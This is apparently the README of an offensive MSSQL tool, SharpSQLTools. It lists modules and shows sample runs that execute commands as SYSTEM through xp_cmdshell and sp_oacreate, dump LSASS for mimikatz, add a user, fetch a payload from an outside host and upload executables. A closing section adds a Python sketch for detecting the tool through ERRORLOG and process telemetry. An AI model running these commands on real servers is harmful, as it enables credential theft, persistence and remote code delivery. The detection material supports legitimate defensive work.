A small tool written together with RcoIl. It can upload and download files, execute commands through xp_cmdshell and sp_oacreate with output returned in both modes, and load a CLR assembly to perform the corresponding operations. The feature set is modelled on mssqlproxy; because we do not yet know how to obtain the underlying socket of a SQL connection from C#, the mssqlproxy part of this project is not implemented yet. Also note that CLR is not suitable for some thread- and process-related operations.
```
> SharpSQLTools.exe
[ASCII-art banner: SharpSQLTools, by Rcoil & Uknow]

Usage:
  SharpSQLTools target username password                - interactive console
  SharpSQLTools target username password module command - non-interactive console

Module:
  enable_xp_cmdshell          - you know what it means
  disable_xp_cmdshell         - you know what it means
  xp_cmdshell {cmd}           - executes cmd using xp_cmdshell
  sp_oacreate {cmd}           - executes cmd using sp_oacreate
  enable_ole                  - you know what it means
  disable_ole                 - you know what it means
  upload {local} {remote}     - upload a local file to a remote path (OLE required)
  download {remote} {local}   - download a remote file to a local path
  enable_clr                  - you know what it means
  disable_clr                 - you know what it means
  install_clr                 - create assembly and procedure
  uninstall_clr               - drop clr
  clr_dumplsass               - dumplsass by clr
  clr_adduser {user} {pass}   - add user by clr
  clr_download {url} {path}   - download file from url by clr
  exit                        - terminates the server process (and this session)
```
Both an interactive and a non-interactive mode are supported. In interactive mode you only pass the target, username and password; in non-interactive mode you additionally pass the module name and the command.
```
λ SharpSQLTools.exe 192.168.28.27 sa 1qaz@WSX xp_cmdshell whoami
[*] Database connection is successful!
nt authority\system
```

```
λ SharpSQLTools.exe 192.168.28.27 sa 1qaz@WSX sp_oacreate whoami
[*] Database connection is successful!
[+] c:\windows\system32\cmd.exe /c whoami > C:\Users\Public\Downloads\1611131759069.txt
[+] Reading C:\Users\Public\Downloads\1611131759069.txt
nt authority\system
[+] Deleting C:\Users\Public\Downloads\1611131759069.txt
```

```
λ SharpSQLTools.exe 192.168.28.27 sa 1qaz@WSX clr_dumplsass
[*] Database connection is successful!
[*] Dumping lsass (488) to C:\Windows\Temp\debug488.out
[+] Dump successful!
[*] Compressing C:\Windows\Temp\debug488.out to C:\Windows\Temp\debug488.bin gzip file
[X] Output file 'C:\Windows\Temp\debug488.bin' already exists, removing
[*] Deleting C:\Windows\Temp\debug488.out
[+] Dumping completed. Rename file to "debug488.gz" to decompress.
[*] Operating System : Windows Server 2008 R2 Standard
[*] Architecture : AMD64
[*] Use "sekurlsa::minidump debug.out" "sekurlsa::logonPasswords full" on the same OS/arch
```

```
λ SharpSQLTools.exe 192.168.28.27 sa 1qaz@WSX clr_adduser test1234 1qaz@WSX
[*] Database connection is successful!
[*] Adding User success
[*] Adding Group Member success
```

```
λ SharpSQLTools.exe 192.168.28.27 sa 1qaz@WSX clr_download "http://192.168.28.185:8001/clac.bin" "c:\Users\Public\Downloads\test.bin"
[*] Database connection is successful!
[*] Download success
```

```
λ SharpSQLTools.exe 192.168.28.27 sa 1qaz@WSX upload C:\Users\Pentest\Desktop\test\usc.exe c:\Users\Public\Downloads\11.exe
[*] Database connection is successful!
[*] Uploading 'C:\Users\Pentest\Desktop\test\usc.exe' to 'c:\Users\Public\Downloads\11.exe'...
[+] 7-1 Upload completed
[+] 7-2 Upload completed
[+] 7-3 Upload completed
[+] 7-4 Upload completed
[+] 7-5 Upload completed
[+] 7-6 Upload completed
[+] 7-7 Upload completed
[+] copy /b c:\Users\Public\Downloads\11.exe_x.config_txt c:\Users\Public\Downloads\11.exe
[+] del c:\Users\Public\Downloads\*.config_txt
[*] 'C:\Users\Pentest\Desktop\test\usc.exe' Upload completed
```

```
λ SharpSQLTools.exe 192.168.28.27 sa 1qaz@WSX download c:\Users\Public\Downloads\t.txt C:\Users\Pentest\Desktop\test\t.txt
[*] Database connection is successful!
[*] Downloading 'c:\Users\Public\Downloads\t.txt' to 'C:\Users\Pentest\Desktop\test\t.txt'...
[*] 'c:\Users\Public\Downloads\t.txt' Download completed
```
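From the defender's side, the enable_* modules and the sp_oacreate mode above leave two recognisable traces: SQL Server writes a "Configuration option ... changed from 0 to 1" line to its ERRORLOG whenever xp_cmdshell, Ole Automation Procedures or clr enabled is switched on, and the sp_oacreate path spawns cmd.exe with output redirected to C:\Users\Public\Downloads\<13-digit timestamp>.txt. The following detection sketch is an added example, not part of SharpSQLTools; the sample ERRORLOG lines are constructed and the message format is the one SQL Server actually emits.

```python
import re

# Options flipped by enable_xp_cmdshell / enable_ole / enable_clr via sp_configure.
# SQL Server logs each change to the ERRORLOG in the format matched below.
WATCHED_OPTIONS = {"xp_cmdshell", "Ole Automation Procedures", "clr enabled"}

CONFIG_CHANGE_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}\.\d{2})\s+(?P<spid>spid\d+)\s+"
    r"Configuration option '(?P<option>[^']+)' changed from (?P<old>\d) to (?P<new>\d)\."
)

# The sp_oacreate module redirects command output to
# C:\Users\Public\Downloads\<millisecond timestamp>.txt, reads it back, then deletes it.
OACREATE_CMDLINE_RE = re.compile(
    r"cmd\.exe /c .+ > C:\\Users\\Public\\Downloads\\\d{13}\.txt$", re.IGNORECASE
)


def find_enabled_options(errorlog_lines):
    """Return (timestamp, spid, option) for every watched option switched 0 -> 1."""
    hits = []
    for line in errorlog_lines:
        m = CONFIG_CHANGE_RE.match(line.strip())
        if m and m["option"] in WATCHED_OPTIONS and (m["old"], m["new"]) == ("0", "1"):
            hits.append((m["ts"], m["spid"], m["option"]))
    return hits


def looks_like_oacreate_exec(command_line):
    """True if a process command line matches the sp_oacreate redirect pattern."""
    return OACREATE_CMDLINE_RE.search(command_line) is not None


# Constructed sample ERRORLOG lines (not taken from a real server).
SAMPLE_ERRORLOG = [
    "2021-01-20 16:35:58.01 spid55      Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.",
    "2021-01-20 16:35:59.07 spid55      Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.",
    "2021-01-20 16:36:02.33 spid55      Configuration option 'Ole Automation Procedures' changed from 0 to 1. Run the RECONFIGURE statement to install.",
    "2021-01-20 16:40:10.12 spid55      Configuration option 'xp_cmdshell' changed from 1 to 0. Run the RECONFIGURE statement to install.",
    "2021-01-20 16:41:00.00 spid12      Starting up database 'tempdb'.",
]

if __name__ == "__main__":
    for ts, spid, option in find_enabled_options(SAMPLE_ERRORLOG):
        print(f"{ts} {spid}: '{option}' enabled")
    print(looks_like_oacreate_exec(
        r"c:\windows\system32\cmd.exe /c whoami > C:\Users\Public\Downloads\1611131759069.txt"))
```

Pair the ERRORLOG check with process-creation telemetry where the parent is sqlservr.exe; a disable_* call shortly after an enable_* call (as in the sample, where xp_cmdshell goes 0 -> 1 and back) is the cleanup pattern this tool produces.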
https://github.com/uknowsec/SharpSQLTools